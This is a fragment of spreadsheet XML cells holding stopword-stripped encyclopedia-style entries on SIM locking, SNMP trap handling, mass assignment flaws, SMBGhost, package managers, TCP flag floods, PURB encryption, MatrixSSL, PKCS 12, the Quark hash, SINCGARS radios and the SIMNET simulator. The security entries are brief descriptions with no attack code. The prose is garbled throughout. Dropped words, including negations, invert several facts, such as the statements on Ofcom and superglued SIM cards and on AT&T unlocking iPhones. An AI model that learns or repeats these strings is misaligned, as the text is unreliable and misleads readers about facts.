handset. however, 2016, carriers stopped locking phones altogether. switzerland locking particularly common there. swisscom began lifting lock since july 2013. sunrise prepaid mobile phones lock years purchase. thailand thailand also another country forbids outright locking result, phones sold market subsidized carriers. recently mobile phone manufacturers store fronts mobile carriers service providers. turkey locking common turkey, considered bigger markets unlocked phones. leading national network provider, türkcell well closest rival, türk telekom never subsidized mobile phones. united kingdom united kingdom, mobile phone network providers obliged provide unlocking, even contract. ofcom, uk's telecom regulator, allowed sell mobile phone card permanently superglued phone. most operators offer form unlocking service, depending state contract model phone, usually charge. full oftel 2002 sim-lock position paper specifies sim-locking regulator wants "consumer awareness". examples within position paper "examples" current carrier practices illustration purposes, reflect official oftel regulation. main networks often agree unlock handsets charge, either contract prepaid handsets, several months. some blackberry handsets supplied vodafone (e.g., storm) examples carrier offering unlocking codes. april 2011 unlock pay-monthly phones free, even they're still contract, exception handsets made exclusively them, palm devices.carphone warehouse, largest phone retailers, offers unlocked phones payg deals. january 2014, phones sold unlocked. phones bought date unlocked free.on december 2019, ofcom announced would explore mandate banning locking.on october 2020, uk's mobile networks forbidden selling phones locked services december 2021. united states american carriers, t-mobile, unlock handsets active account good standing least days unlock code request last days. other, at&amp;t mobility, required upon request (with exceptions requirements) ninety days active service terms class action settlement. prior settlement, at&amp;t would usually concluded contract, situations. at&amp;t past stated would unlock iphones circumstances, regardless legality even customers contract. however, at&amp;t since announced starting april 2012, begin unlocking off-contract iphones, provided customer's account good standing. at&amp;t also unannounced policy unlocking iphones united states service members deployed overseas—even still contract.before carriers began voluntarily providing unlock codes phone models, 2010 electronic frontier foundation (eff) successfully convinced united states copyright office allow exemption general prohibition circumvention copyright protection systems digital millennium copyright 1998 unlocking phones user self-help (sometimes referred "hacking"). this exemption become less important carriers voluntarily providing unlock codes. according ruling effective october 2012, illegal unlock phones purchased days date later without carrier's permission. words, users already unlock phones already own, phones purchased january 2013, phones purchased point unlocked carrier's permission. march 2013, obama administration federal communications commission said consumers also able switch carriers keep actual phones.on august 2014, president obama signed unlocking consumer choice wireless competition 517; 113th congress), bill legalizing unlocking cellphones bill passed united states senate july 2014, united states house representatives july 2014. sprint agreed allow domestic unlocking mobile devices launched february 2015.it possible unlocked phones u.s. some online retailers sell phones come unlocked manufacturer, never locked first place. also regional lockout android rooting hardware restrictions international mobile equipment identity (imei) jailbreak (computer science) jailbreaking vendor lock-in bootloader unlocking references</t>
  </si>
  <si>
    <t>SNMPTT</t>
  </si>
  <si>
    <t>snmptt snmp trap handler written perl net-snmp/ucd-snmp snmptrapd program. received traps translated user friendly messages using variable substitution. output stdout, text file, syslog, event log, mysql (linux/windows), postgresql, odbc database. user defined programs also executed. distribution snmptt downloaded sourceforge project page project page. books information snmptt available following books: turnbull, james; (2006) nagios francisco: apress isbn 1-59059-609-9 schubert, al.; (2008) nagios enterprise network monitoring syngress isbn 978-1-59749-267-6 barth, wolfgang; (2008) "nagios: system network monitoring, edition starch press isbn 1-59327-179-4</t>
  </si>
  <si>
    <t>Mass assignment vulnerability</t>
  </si>
  <si>
    <t>mass assignment computer vulnerability active record pattern application abused modify data items user normally allowed access password, granted permissions, administrator status. many application frameworks offer active record object-relational mapping features, external data serialization formats automatically converted input internal objects and, turn, database record fields. framework's interface conversion permissive application designer mark specific fields immutable, possible overwrite fields never intended modified outside (e.g. admin permissions flag).these vulnerabilities found applications written ruby rails, asp.net mvc, java play framework.in 2012 mass assignment ruby rails allowed bypassing mapping restrictions resulted proof concept injection unauthorized public keys user accounts github. further vulnerabilities ruby rails allowed creation internal objects specially crafted json structure.in asp.net core mapping restriction declared using [bindnever] attribute. also data transfer object (dto) references</t>
  </si>
  <si>
    <t>SMBGhost</t>
  </si>
  <si>
    <t>smbghost smbleedingghost coronablue) type security vulnerability, wormlike features, affects windows computers first reported publicly march 2020. proof-of-concept (poc) exploit code published june 2020 github security researcher. code could possibly spread millions unpatched computers, resulting much tens billions dollars losses.microsoft recommends users windows versions 1903 1909 windows server versions 1903 1909 install patches, states, recommend customers install updates soon possible publicly disclosed vulnerabilities potential leveraged actors update vulnerability released march [2020], customers installed updates, automatic updates enabled, already protected." workarounds, according microsoft, disabling compression blocking port 445, help sufficient.according advisory division homeland security, "malicious cyber actors targeting unpatched systems [threat], [and] strongly recommends using firewall block server message block ports internet apply patches critical- high-severity vulnerabilities soon possible." references external links video (02:40) smbghost patching (cve-2020-0796) youtube march 2020) video (02:40) smbghost check (cve-2020-0796) youtube march 2020) video (04:22) smbghost vulnerability (cve-2020-0796) youtube march 2020) video (11:10) smbghost scan/exploit (cve-2020-0796) youtube march 2020) video (07:27) smbghost explained (cve-2020-0796) youtube april 2020) video (00:50) smbghost crashes (cve-2020-0796) youtube june 2020)</t>
  </si>
  <si>
    <t>Package manager</t>
  </si>
  <si>
    <t>package manager package-management system collection software tools automates process installing, upgrading, configuring, removing computer programs computer consistent manner.a package manager deals packages, distributions software data archive files. packages contain metadata, software's name, description purpose, version number, vendor, checksum (preferably cryptographic hash function), list dependencies necessary software properly. upon installation, metadata stored local package database. package managers typically maintain database software dependencies version information prevent software mismatches missing prerequisites. they work closely software repositories, binary repository managers, stores. package managers designed eliminate need manual installs updates. this particularly useful large enterprises whose operating systems typically consist hundreds even tens thousands distinct software packages. history early package managers, around 1994, automatic dependency resolution could already drastically simplify process adding removing software running system.by around 1995, beginning cpan, package managers began work downloading packages repository, automatically resolving dependencies installing needed, making much easier install, uninstall update software system. functions software package archive file containing computer program well necessary metadata deployment. computer program source code compiled built first. package metadata include package description, package version, dependencies (other packages need installed beforehand). package managers charged task finding, installing, maintaining uninstalling software packages upon user's command. typical functions package management system include: working file archivers extract package archives ensuring integrity authenticity package verifying checksums digital certificates, respectively looking downloading, installing, updating existing software software repository store grouping packages function reduce user confusion managing dependencies ensure package installed packages requires, thus avoiding "dependency hell" challenges shared libraries computer systems rely dynamic library linking, instead static library linking, share executable libraries machine instructions across packages applications. systems, complex relationships different packages requiring different versions libraries results challenge colloquially known "dependency hell". microsoft windows systems, also called "dll hell" working dynamically linked libraries. good package management vital systems. framework system openstep attempt solving issue, allowing multiple versions libraries installed simultaneously, software packages specify version linked against. front-ends locally compiled packages system administrators install maintain software using tools package management software. example, local administrator download unpackaged source code, compile install this cause state local system fall synchronization state package manager's database. local administrator required take additional measures, manually managing dependencies integrating changes package manager. there tools available ensure locally compiled packages integrated package management. distributions based .deb .rpm files well slackware linux, checkinstall, recipe-based systems gentoo linux hybrid systems arch linux, possible write recipe first, ensures package fits local package database. maintenance configuration particularly troublesome software upgrades upgrades configuration files. since package managers, least unix systems, originated extensions file archiving utilities, usually either overwrite retain configuration files, rather applying rules them. there exceptions usually apply kernel configuration (which, broken, render computer unusable restart). problems caused format configuration files changes; instance, configuration file explicitly disable options disabled. some package managers, debian's dpkg, allow configuration installation. situations, desirable install packages default configuration overwrite configuration, instance, headless installations large number computers. this kind pre-configured installation also supported dpkg. repositories give users control kinds software allowing installed system (and sometimes legal convenience reasons distributors' side), software often downloaded number software repositories. upgrade suppression when user interacts package management software bring upgrade, customary present user list actions executed (usually list packages upgraded, possibly giving version numbers), allow user either accept upgrade bulk, select individual packages upgrades. many package managers configured never upgrade certain packages, upgrade critical vulnerabilities instabilities found previous version, defined packager software. this process sometimes called version pinning. instance: supports syntax exclude=openoffice* pacman ignorepkg= openoffice suppress upgrading openoffice cases) dpkg dselect support partially hold flag package selections extends hold flag complex "pinning" mechanism (users also blacklist package) aptitude "hold" "forbid" flags portage supports package.mask configuration file cascading package removal some advanced package management features offer "cascading package removal", packages depend target package packages target package depends also removed. comparison commands although commands specific every particular package manager, large extent translatable, package managers offer similar functions. arch linux pacman/rosetta wiki offers extensive overview. prevalence package managers like dpkg existed early 1994.linux distributions oriented binary packages rely heavily package management systems primary means managing maintaining software. mobile operating systems android (linux-based), (unix-based), windows phone rely almost exclusively respective vendors' stores thus dedicated package management systems. comparison installers package manager often called "install manager", lead confusion package managers installers. differences include: comparison build automation utility most software configuration management systems treat building software deploying software separate, independent steps. build automation utility typically takes human-readable source code files already computer, automates process converting binary executable package remote computer. later package manager typically running computer downloads pre-built binary executable packages internet installs them. however, kinds tools many commonalities: example, dependency graph topological sorting used package manager handle dependencies binary components also used build manager handle dependency source components. example, many makefiles support building executables, also installing make install. example, every package manager source-based distribution portage, sorcery, homebrew, etc. supports converting human-readable source code binary executables installing it.a tools, maak a-a-p, designed handle building deployment, used either build automation utility package manager both. common package managers formats universal package manager also known binary repository manager, software tool designed optimize download storage binary files, artifacts packages used produced software development process. these package managers standardize enterprises treat package types. they give users ability apply security compliance metrics across artifact types. universal package managers referred center devops toolchain. package formats each package manager relies format metadata packages manage. that package managers need groups files bundled specific package manager along appropriate metadata, dependencies. often, core utilities manages basic installation packages multiple package managers utilities provide additional functionality. example, relies backend. extends functionality backend adding features simple configuration maintaining network systems. another example, synaptic package manager provides graphical user interface using advanced packaging tool (apt) library, which, turn, relies dpkg core functionality. alien program converts different linux package formats, supporting conversion linux standard base (lsb) compliant .rpm packages, .deb, stampede (.slp), solaris (.pkg) slackware (.tgz, .txz, .tbz, .tlz) packages. mobile operating systems, google play consumes android application package (apk) package format microsoft store uses appx formats. (both google play microsoft store eponymous package managers.) free open source software systems nature free open source software, packages similar compatible licenses available number operating systems. these packages combined distributed using configurable internally complex packaging systems handle many permutations software manage version-specific dependencies conflicts. some packaging systems free open source software also released free open source software. typical difference package management proprietary operating systems, windows, free open source software, linux, free open source software systems permit third-party packages also installed upgraded mechanism, whereas package managers windows upgrade software provided apple microsoft, respectively (with exception third party drivers windows). ability continuously upgrade third-party software typically added adding corresponding repository package management's configuration file. application-level package managers beside system-level application managers, add-on package managers operating systems limited capabilities programming languages developers need latest libraries. unlike system-level package managers, application-level package managers focus small part software system. they typically reside within directory tree maintained system-level package manager, c:\cygwin /opt/sw. however, might case package managers deal programming libraries, leading possible conflict package managers claim "own" file might break upgrades. impact murdock commented package management "the single biggest advancement linux brought industry", blurs boundaries operating system applications, makes "easier push innovations [...] marketplace [...] evolve os".there also conference package manager developers known packagingcon. established 2021 understand different approaches package management. also dependency hell installation (computer programs) list software package management systems manifest file package format references external links package management cheatsheet distrowatch archlinux rosetta stone command line comparison package managers upkg universal package manager wrapper provides syntax flavors linux</t>
  </si>
  <si>
    <t>PUSH and ACK floods</t>
  </si>
  <si>
    <t>push floods floods denial service attacks based flags. since flags require additional processing possible overwhelm service setting flags numerous requests. mitigation proxy filters drop appropriate packets flags system considered attack. also flood references</t>
  </si>
  <si>
    <t>PURB (cryptography)</t>
  </si>
  <si>
    <t>cryptography, padded uniform random blob purb discipline encrypted data formats designed minimize unintended information leakage either encryption format metadata total length. properties purbs when properly created, purb's content indistinguishable uniform random string observer without relevant decryption key. purb therefore leaks information headers cleartext metadata associated encrypted data format. this leakage minimization "hygiene" practice contrasts traditional encrypted data formats pretty good privacy, include cleartext metadata encoding information application created data, data format version, number recipients data encrypted for, identities public keys recipients, ciphers suites used encrypt data. while encryption metadata considered non-sensitive encrypted formats designed, modern attack techniques found numerous ways employ incidentally-leaked metadata facilitating attacks, identifying data encrypted weak ciphers obsolete algorithms, fingerprinting applications track users identify software versions known vulnerabilities, traffic analysis techniques identifying users, groups, associated public keys involved conversation encrypted message observed them. addition, purb padded constrained possible lengths, order minimize amount information encrypted data could potentially leak observers total length. without padding, encrypted objects files strings {\displaystyle bits length leak {\displaystyle o(\log bits information observer namely number bits required represent length exactly. purb padded length representable floating point number whose mantissa longer (i.e., contains significant bits) exponent. this constraint limits maximum amount information purb's total length leak {\displaystyle o(\log \log bits, significant asymptotic reduction best achievable general variable-length encrypted formats whose multiplicative overhead limited constant factor unpadded payload size. this asymptotic leakage would obtain padding encrypted objects power base, power two. allowing significant mantissa bits length's representation rather exponent, however, significantly reduces overhead padding. example, padding next power impose 100% overhead nearly doubling object's size, purb's padding imposes overhead small strings decreasing gradually etc.) objects larger. experimental evidence indicate data sets comprising objects files, software packages, online videos, leaving objects unpadded padding constant block size often leaves uniquely identifiable total length alone. padding objects power purb length, contrast, ensures objects indistinguishable least objects thus nontrivial anonymity set. encoding decoding purbs because purb discipline designing encrypted formats particular encrypted format, single prescribed method encoding decoding purbs. applications encryption encoding scheme provided produces string appears uniformly random observer without appropriate key, provided appropriate hardness assumptions satisfied course, provided purb padded allowed lengths. correctly-encoded purbs therefore identify application created ciphertext. decoding application, therefore, cannot readily tell decryption whether purb encrypted application user, trying decrypt available decryption keys. encoding decoding purb presents technical efficiency challenges, traditional parsing techniques applicable purb definition metadata markers traditional parser could discern purb's structure decrypting instead, purb must decrypted first obliviously internal structure, parsed decoder used appropriate decryption find suitable cryptographic entrypoint purb. encoding decoding purbs intended decrypted several different recipients, public keys, and/or ciphers presents additional technical challenge recipient must find different entrypoint distinct location purb non-overlapping recipients, purb presents cleartext metadata indicating positions entrypoints even total number them. paper proposed purbs also included algorithms encrypting objects multiple recipients using multiple cipher suites. with algorithms, recipients find respective entrypoints purb logarithmic number trial decryptions using symmetric-key cryptography expensive public-key operation cipher suite. third technical challenge representing public-key cryptographic material needs encoded entrypoint purb, ephemeral diffie-hellman public recipient needs derive shared secret, encoding indistinguishable uniformly random bits. because standard encodings elliptic-curve points readily distinguishable random bits, example, special indistinguishable encoding algorithms must used purpose, elligator successors. tradeoffs limitations primary privacy advantage purbs offer strong assurance correctly-encrypted data leaks nothing incidental internal metadata observers might readily identify weaknesses data software used produce fingerprint application user created purb. this privacy advantage translate security benefit data encrypted weak obsolete ciphers, software known vulnerabilities attacker might exploit based trivially-observable information gleaned cleartext metadata. primary disadvantage purb encryption discipline complexity encoding decoding, decoder cannot rely conventional parsing techniques decryption. secondary disadvantage overhead padding adds, although padding scheme proposed purbs incurs percent overhead objects significant size. padme padding proposed purb paper creates files specific distinct sizes. thus, encrypted file often identified purb encrypted high confidence, probability file exactly padded sizes low. another padding problem occurs short messages, padding effectively hide size content. critique incurring complexity overhead costs purb encryption context purb stored transmitted often leak metadata encrypted content anyway, metadata outside encryption format's purview control thus cannot addressed encryption format alone. example, application's user's choice filename directory store purb disk indicate allow observer infer application likely created purpose, even purb's data content not. similarly, encrypting e-mail's body purb instead traditional s/mime format eliminate encryption format's metadata leakage, cannot prevent information leakage cleartext e-mail headers, endpoint hosts e-mail servers involved exchange. nevertheless, separate complementary disciplines typically available limit contextual metadata leakage, appropriate file naming conventions pseudonymous e-mail addresses sensitive communications. references</t>
  </si>
  <si>
    <t>MatrixSSL</t>
  </si>
  <si>
    <t>matrixssl open-source tls/ssl implementation designed custom applications embedded hardware environments.the matrixssl library contains full cryptographic software module includes industry-standard public symmetric algorithms. called inside secure toolkit. features features: protocol versions dtls dtls public algorithms elliptic curve cryptography diffie–hellman symmetric algorithms aes-gcm triple chacha arc4 seed supported cipher suites tls_aes_128_gcm_sha256 (tls 1.3) tls_aes_256_gcm_sha384 (tls 1.3) tls_chacha20_poly1305_sha256 (tls 1.3) tls_dhe_rsa_with_aes_128_cbc_sha tls_dhe_rsa_with_aes_256_cbc_sha tls_dhe_rsa_with_aes_128_cbc_sha256 tls_dhe_rsa_with_aes_256_cbc_sha256 ssl_dhe_rsa_with_3des_ede_cbc_sha tls_rsa_with_seed_cbc_sha tls_dhe_psk_with_aes_128_cbc_sha tls_dhe_psk_with_aes_256_cbc_sha tls_psk_with_aes_128_cbc_sha tls_psk_with_aes_256_cbc_sha tls_ecdhe_ecdsa_with_aes_128_cbc_sha tls_ecdhe_ecdsa_with_aes_256_cbc_sha tls_ecdhe_ecdsa_with_aes_128_gcm_sha256 tls_ecdhe_ecdsa_with_aes_256_gcm_sha384 tls_ecdhe_rsa_with_aes_128_cbc_sha tls_ecdhe_rsa_with_aes_256_cbc_sha tls_ecdhe_rsa_with_aes_128_cbc_sha256 tls_ecdhe_rsa_with_aes_256_cbc_sha256 tls_ecdhe_rsa_with_aes_128_gcm_sha256 tls_ecdhe_rsa_with_aes_256_gcm_sha384 tls_ecdh_ecdsa_with_aes_128_cbc_sha tls_ecdh_ecdsa_with_aes_256_cbc_sha tls_ecdh_rsa_with_aes_128_cbc_sha tls_ecdh_rsa_with_aes_256_cbc_sha tls_ecdh_ecdsa_with_aes_128_cbc_sha256 tls_ecdhe_ecdsa_with_aes_128_cbc_sha256 tls_rsa_with_aes_128_cbc_sha tls_rsa_with_aes_256_cbc_sha tls_rsa_with_aes_128_cbc_sha256 tls_rsa_with_aes_256_cbc_sha256 tls_rsa_with_aes_128_gcm_sha256 tls_rsa_with_aes_256_gcm_sha384 ssl_rsa_with_3des_ede_cbc_sha ssl_rsa_with_rc4_128_sha ssl_rsa_with_rc4_128_md5 tls_dh_anon_with_aes_128_cbc_sha tls_dh_anon_with_aes_256_cbc_sha ssl_dh_anon_with_3des_ede_cbc_sha ssl_dh_anon_with_rc4_128_md5 client authentication secure renegotiation standard session resumption stateless session resumption transport independent pkcs#1 pkcs#8 parsing false start fragment length extension optional pkcs#11 crypto interface major releases also comparison implementations gnutls wolfssl external links official website inside secure website references</t>
  </si>
  <si>
    <t>PKCS 12</t>
  </si>
  <si>
    <t>cryptography, pkcs defines archive file format storing many cryptography objects single file. commonly used bundle private x.509 certificate bundle members chain trust. pkcs file encrypted signed. internal storage containers, called "safebags", also encrypted signed. safebags predefined store certificates, private keys crls. another safebag provided store data individual implementer's choice.pkcs family standards called public-key cryptography standards (pkcs) published laboratories. filename extension pkcs files .p12 .pfx.these files created, parsed read openssl pkcs12 command. relationship file format pkcs successor microsoft's "pfx"; however, terms "pkcs file" "pfx file" sometimes used interchangeably.the format criticised complex cryptographic protocols. normal usage full pkcs standard complex. enables buckets complex objects pkcs structures, nested deeply. practice normally used store private associated certificate chain. pkcs files usually created using openssl, supports single private command line interface. java keytool used create multiple "entries" since java incompatible many systems. java pkcs default keystore format.a simpler, alternative format pkcs lists certificates possibly private keys base strings text file. gnutls's certtool also used create pkcs files including certificates, keys, certificates --to-p12. however, beware interchangeability software, sources base64 text, --outder also used. references external links 7292 pkcs #12: personal information exchange syntax v1.1 "pkcs #12: personal information exchange syntax standard". laboratories. archived original 2017-04-17. this standard specifies portable format storing transporting user's private keys, certificates, miscellaneous secrets, etc.overview pkcs#12 capabilities, usage, implementations, history future: ryan hurst yury strozhevsky (2015-12-02). "the pkcs#12 standard needs another update". archived original 2017-03-03.</t>
  </si>
  <si>
    <t>PSOD</t>
  </si>
  <si>
    <t>Quark (hash function)</t>
  </si>
  <si>
    <t>quark cryptographic hash function (family). designed jean-philippe aumasson, luca henzen, willi meier maría naya-plasencia. quark created expressed need application designers (notably implementing rfid protocols) lightweight cryptographic hash function. sha-3 nist hash function competition concerned general-purpose designs focused software performance. quark lightweight hash function, based single security level sponge construction, minimize memory requirements. inspired lightweight ciphers grain katan, hash function family quark composed three instances u-quark, d-quark, t-quark. hardware benchmarks show quark compares well previous lightweight hashes. example, u-quark conjecturally instance provides least 64-bit security attacks (collisions, multicollisions, distinguishers, etc.), fits 1379 gate-equivalents, consumes average 2.44 0.18 asic. external links quark jean-philippe aumasson's website 131002.net quark international association cryptologic research website iacr.org</t>
  </si>
  <si>
    <t>SINCGARS</t>
  </si>
  <si>
    <t>single channel ground airborne radio system (sincgars) combat-net radio (cnr) used u.s. allied military forces. network designed around three systems: sincgars, high frequency (hf) radio, tactical satellite (tacsat). each system different capabilities transmission characteristics. sincgars family user-owned operated, high frequency-frequency modulation (vhf-fm) cnrs. network, sincgars’ primary role voice transmission command control (c2) surface airborne assets. sincgars transmit receive secure data facsimile transmissions simple connections various data terminal equipment. sincgars features provide communications interoperability army, marine, navy, force, thus contributing successful combat operations. also consistent north atlantic treaty organization interoperability requirements. radios, handled voice data communications, designed reliable, secure, easily maintained. vehicle-mount, backpack, airborne, handheld form factors available. joint combined operations require exchanging information, voice data, participating forces. single-channel ground airborne radio system (sincgars) tactical radio provided secure, probability intercept/electronic attack voice communications frequency hopping (fh) mode. later enhancements provide exchange secure data evolving army marine corps tactical internets, enabling increased situational awareness expedient engagement enemy reducing probability fratricide. addition, enhanced position location reporting system (eplrs) used military forces provide data distribution, battlefield situation awareness, position location services. sincgars family mostly replaced vietnam war-era synthesized single frequency radios (an/prc-77 an/vrc-12), although work them. airborne an/arc-201 radio phasing older tactical air-to-ground radios (an/arc-114 an/arc-131). sincgars designed modular basis achieve maximum commonality among various ground, maritime, airborne configurations. common receiver transmitter (rt) used ground configurations. modular design also reduces burden logistics system provide repair parts. sincgars operate either frequency (fh) mode, stores frequencies loadsets. system compatible current u.s. allied vhf-fm radios non-secure mode. sincgars operates 2320 channels megahertz (mhz) channel separation kilohertz (khz). accepts either digital analog inputs superimposes signal onto radio frequency (rf) carrier wave. mode, input changes frequency times second portions tactical vhf-fm range. these continual changes frequency hinder threat intercept jamming units locating disrupting friendly communications. sincgars provides data rates 16,000 bits second. enhanced data modes provide packet rs-232 data. enhanced data modes available system improvement program (sip) advanced system improvement program (asip) radios also enable forward error correction (fec), increased speed, range, accuracy data transmissions. most ground sincgars radios ability control output power; however, airborne sincgars radio sets fixed power. those power settings vary transmission range approximately meters (660 feet) kilometers (km) (6.2 miles). adding power amplifier increases line sight (los) range approximately miles). (these ranges planning purposes only; terrain, weather, antennae height effect transmission range.) variable output power level allows users operate minimum power necessary maintain reliable communications, thus lessening electromagnetic signature given radio sets. this ability particular importance major command posts, operate multiple networks. users outside network hailing method request access network. when hailing network, user outside network contacts network control station (ncs) frequency. active mode, sincgars radio gives audible visual signals operator external subscriber wants communicate network. sincgars operator must change frequency communicate outside radio system. network manual frequency initial network activation. manual frequency provides common frequency members network verify equipment operational. during initial activation, operators tune manual frequency. after communications established, switches mode transfers hopping variables stations. over 570,000 radios purchased. there several system improvement programs, including integrated communications security (icom) models, provided integrated voice data encryption, special improvement program (sip) models, additional data modes, advanced (asip) models, less half size weight icom models provided enhanced (forward error correction) data modes, rs-232 asynchronous data, packet data formats, direct interfacing precision lightweight receiver (plgr) devices providing radio level situational awareness capability. 1992, u.s. force awarded contract replace an/arc-188 communications force aircraft army units. timeline november 1983: corporation (itt) wins contract first type radio, ground troops. 1985: wins contract airborne sincgars. may-june 1988: 31st infantry begins initial field tests sincgars radio fort sill july 1988: general dynamics wins second-source contract ground radio. february april 1989: infantry division field tests sincgars improvised man-pack configuration korean dmz. april 1989: reaches "milestone iiib": full-rate production. december 1990: division equipped. december 1991: general dynamics wins "option award" ground radio. march 1992: wins "ground airborne" award. july 1992: magnavox electronics systems company develops airborne sincgars an/arc-222 force august 1993: general dynamics achieves full rate production. april 1994: general dynamics compete ground radio. 1994: wins sole-source contract airborne radio. 1997: became sole source supplier half-size rt-1523e radio army. 2006: rt-1523f/sidehat configuration provides 2-channel capability. july 2009: wins rt-1523g platform development, $363 million contract. partnered thales communications inc. 2012: capability provide universal network situational awareness help prevent air-to-ground friendly fire incidents. 2016: harris corp. awarded $405 million contract moroccan army concerning sincgars system equipment including ancillary items, spare parts, installation kits, training fielding support services. solicited received, estimated completion date april 2021. june 2016: harris corporation awarded million order supply tactical radios middle east nation. harris corporation (nyse:hrs) received million order provide tactical radios, management systems, training field support services nation middle east part ongoing modernization program. contract awarded fourth quarter harris’ 2016 fiscal year. [1]harris.com, 2016-06-12. retrieved 2017-12-14 http://www.defenseworld.net january 2017: harris corp. awarded maximum $403 million contract from defense logistics agency spare parts supporting various tactical radio systems, includes sincgars. this five-year contract option periods january 2022 performance completion date. using customers army defense logistics agency, department defense. types appropriation fiscal 2017 fiscal 2022 army working capital; defense working capital funds, funded year delivery order issuance. contracting activity defense logistics agency land maritime, aberdeen proving ground, maryland (sprbl1-17-d-0002). [2]defenseworld.net, 2017-01-07. retrieved 2017-06-16 http://www.defenseworld.net models rt-1523 radio configurations ancillary items sidehat 'sidehat' simple radio solution attaches existing sincgars radio installations, offering rapid, affordable interoperable wideband network communications early infantry brigade combat team (e-ibct) deployments soldier radio waveform (srw) applications. sincgars airborne an/arc-201 system improvement program (sip) airborne radio reliable, field-proven voice data battlespace communications system networking capabilities. embedded receiver selective availability antispoofing module (saasm) technology embedded receiver (egr) installed rt-1523(e)-(f) providing navigation/communication system support critical warfighter capabilities includes situational awareness, combat navigation timing surveying capabilities. fanout system provides formats single source (rt-1523 integrated saasm plgr/dagr (defense advanced receiver–an/psn-13)). vrcu (vehicle remote control unit) designed placed anywhere vehicle, vrcu important large vehicles tight quarters. vrcu allows full control single dual rt-1523 (models rt-1702 (models radios location within vehicle. single asip radio mount (sarm) latest vehicle installation mount developed specifically rt-1523 rt-1702 radios. sarm solves space weight claim issues associated traditional vehicle installation mounts. sarm operates volt allowing installation military civilian vehicle. also joint tactical radio system (jtrs) plan replacement radio system network simulator simulation sincgars further reading soldier's manual common tasks warrior skill level (stp 21-1-smct), headquarters department army, washington d.c. september 2012. 3-99, task #113-587-2070) tactical single-channel radio communications techniques 24-18), headquarters department army, washington d.c. september 1987. radio operator's handbook 24-19), headquarters department army, washington d.c. 1991. references external links harris.com (pdf) harris.com (pdf) single channel ground airborne radio system (sincgars) fas.org information rt-1439 radio prc68.com https://usacac.army.mil/sites/default/files/misc/doctrine/cdg/cdg_resources/manuals/fm/fm6_02x72.pdf</t>
  </si>
  <si>
    <t>SIMNET</t>
  </si>
  <si>
    <t>simnet wide area network vehicle simulators displays real-time distributed combat simulation: tanks, helicopters airplanes virtual battlefield. simnet developed used united states military. simnet development began mid-1980s, fielded starting 1987, used training successor programs came online well 1990s. origination purpose jack thorpe defense advanced research projects agency (darpa) need networked multi-user simulation. interactive simulation equipment expensive, reproducing training facilities likewise expensive time consuming. early 1980s, darpa decided create prototype research system investigate feasibility creating real-time distributed simulator combat simulation. simnet, resulting application, prove feasibility effectiveness project (pimental blau 1994). training using actual equipment extremely expensive dangerous. being able simulate certain combat scenarios, participants remotely located rather place, hugely reduced cost training risk personal injury (rheingold 1992). long-haul networking simnet originally across multiple kbit/s dial-up lines, using parallel processors compress packets data links. this traffic contained vehicle data also compressed voice. companies developed simnet simnet developed three companies: delta graphics, inc.; perceptronics, inc.; bolt, beranek newman (bbn), inc. there prime contractor simnet; independent contracts made directly three companies. developed vehicle simulation network software, well software artillery, resupply, semi-automated forces often used opposing forces. delta graphics, based bellevue, washington, developed graphics system terrain databases. delta graphics eventually bought bbn. perceptronics, based angeles, responsible actual simnet simulators; company's engineers, human factors personnel manufacturing team designed, developed built full-crew simulators, integrating controls, sound systems visual systems special simulator shells; also installed simulators number facilities germany, trained operators supported system several years. responsible developing dynamic simulation software simulators, well distributed networking communication software kept simulator informed position (and state information) simulators within potential line-of-sight within shared virtual environment. each simulator maintained copy virtual environment, broadcast state information simulators. network advances since networked simulation, simulation station needed display shared virtual environment. display stations mock-ups certain tank aircraft control simulators, configured simulate conditions within actual combat vehicle. tank simulators, example, could accommodate full four-person crew complement enhance effectiveness training. network designed support several hundred users once. fidelity simulation could used train mission scenarios tactical rehearsals operations performed u.s. actions desert storm 1992 (robinett 1994). simnet used concept “dead reckoning” correlate positions objects actors within simulated environment. duncan (duke) miller, simnet program manager, first used term, harks back earliest days ship navigation, explain simulators able communicate state change information minimizing network traffic. essentially, approach involves calculating current position object previous position velocity (which composed vector speed elements) (pimental blau 1994). simnet protocols provided whenever true state simulator deviated certain threshold state computed dead reckoning, simulator obligated send state update message. simnet protocols simnet-based training systems first gulf demonstrates success simnet, legacy viewed proof realtime interactive networked cooperative virtual simulation possible large user population. later, terrestrial wideband network high speed descendant arpanet speeds) used carry traffic. this network remained darpa rest arpanet merged nsfnet arpanet decommissioned (rheingold 1992). graphics advances addition network, second fundamental challenge time simnet conceived inability graphics systems handle large numbers moving models. example, contemporary flight simulators used binary space partitioning computationally effective fixed environments since polygon display order (i.e., depth coherence) pre-computed. while suitable flight simulators, largely point view earth's fixed surface, technique ineffective near ground, order polygons overlay changes location point view. also ineffective large number moving models, since moving model changes depth coherence relative polygons representing ground. contrast, z-buffer techniques depend pre-computed depth coherence therefore enabling technology simnet's on-ground point view large numbers moving vehicles. z-buffering memory intensive relative binary space partitioning made possible part cost time dropped significantly price. simnet used z-buffer displays developed delta graphics. delta graphics founded drew johnston development), mike cyrus (president), boeing aerospace company/graphics lab, beck (cto vp), graphics consultant softtool consulting. graphics processor, gdp, custom developed simnet gary wilson engineer), existing silicon graphics cost architecture. first simulator display processor frame buffer z-buffer algorithms display channel basis show simulated view. army simnet training simnet actively used u.s. army training primarily fort benning, fort rucker, fort knox. additional temporary permanent locations fort leavenworth grafenwoehr, germany. simnet follow-on programs follow-on protocols simnet called distributed interactive simulation; primary u.s. army follow-on program close combat tactical trainer (cctt). simnet-d (developmental) program used simulation systems developed simnet program perform experiments weapon systems, concepts, tactics. became advanced simulation technology demonstration (adst) program. fostered creation battle labs across army, including mounted warfare testbed knox, soldier battle benning, maneuver battle rucker, fires battle sill, additional research programs simnet included work weather real-time terrain modifications. companies technologies founded based simnet experience primary developers network simnet, rolland waters, founded rtime, inc. 1992, provide game industry network engines. sony (scea) bought rtime 2000 basis online game network. other startups delta graphics team include: mvrsimulation inc. garth smith), mvrsimulation privately held small virtual business develops software content building rendering simulated environments. technologies (john morrison warren katz), continues provide simulation software reality design, (joanne west metzger paul metzger), simulation training software systems zipper interactive (brian soderberg), developed socom game series also purchased scea wiz!bang (drew johnston), another game developer. drew johnston currently product unit manager (pum) windows gaming platform team microsoft. references pimental, blau, (1994). “teaching your system share.” ieee computer graphics applications, 14(1), rheingold, (1992). virtual reality, simon schuster, york, n.y. robinett, (1994). “interactivity individual viewpoint shared virtual worlds: screen networked personal displays.” computer graphics, 28(2), stone, (1991). will real body please stand up?: boundary stories about virtual cultures. benedikt (ed.), cyberspace: first steps (pp. 81-118). cambridge: press. external links lenoir, lowood (2003), "theaters war: military-entertainment complex", kunstkammer, laboratorium, bühne—schauplätze wissens 